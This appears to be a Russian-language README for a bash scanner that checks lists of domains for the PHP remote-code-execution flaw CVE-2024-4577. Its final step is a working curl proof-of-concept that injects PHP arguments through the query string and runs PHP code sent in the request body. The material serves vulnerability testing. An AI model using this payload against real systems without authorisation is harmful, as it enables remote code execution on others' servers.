
Этот скрипт предназначен для проверки уязвимости, описываемой CVE-2024-4577, которая связана с эксплуатацией определённых конфигураций PHP для удалённого выполнения произвольного кода. Он отправляет POST-запрос на указанные endpoint'ы по списку доменов и проверяет, указывает ли ответ на уязвимость.
Установите GNU Parallel:
sudo apt-get install parallel
Клонируйте репозиторий: Клонируйте этот репозиторий на свой локальный компьютер с помощью Git:
git clone https://github.com/Yukiioz/CVE-2024-4577.git
Перейдите в репозиторий: Перейдите в клонированный каталог:
cd CVE-2024-4577
Подготовьте список доменов: Создайте текстовый файл, содержащий список доменов для проверки. Каждый домен должен быть на новой строке. Например:
https://example1.com
https://example2.com
https://example3.com
Запустите скрипт:
Выполните скрипт CVE-2024-4577.sh, передав путь к файлу со списком доменов в качестве аргумента:
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
Просмотрите вывод:
Скрипт будет отображать информацию о ходе выполнения по мере проверки каждого домена. Если домен будет признан уязвимым, он будет выделен красным. Скрипт также экспортирует список уязвимых доменов в файл с именем vulnerable_domains.txt.
vulnerable_domains.txtСкрипт экспортирует список уязвимых доменов в файл с именем vulnerable_domains.txt. Этот файл содержит простой список уязвимых доменов, по одному домену на строку. Для дальнейшего ручного подтверждения используйте команду curl для отправки POST-запроса на целевой endpoint домена. Замените https://dev.example.com/test.php на фактический endpoint целевого домена.
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"